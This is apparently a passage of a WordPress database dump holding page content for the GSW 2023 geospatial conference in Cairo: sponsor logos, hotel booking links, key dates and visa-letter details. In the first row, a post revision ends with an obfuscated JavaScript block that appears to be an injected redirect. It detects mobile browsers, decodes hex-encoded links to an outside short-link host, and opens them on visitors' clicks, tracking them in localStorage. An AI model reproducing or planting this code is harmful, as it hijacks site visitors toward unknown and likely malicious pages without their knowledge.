_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-18 13:31:38','2023-06-18 13:31:38','',3066,'https://gsw2023.com/?p=4707',0,'revision','',0),
(4709,1,'2023-06-18 13:45:47','2023-06-18 13:45:47','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686739986286{margin-top: -35px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1687094969343{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, 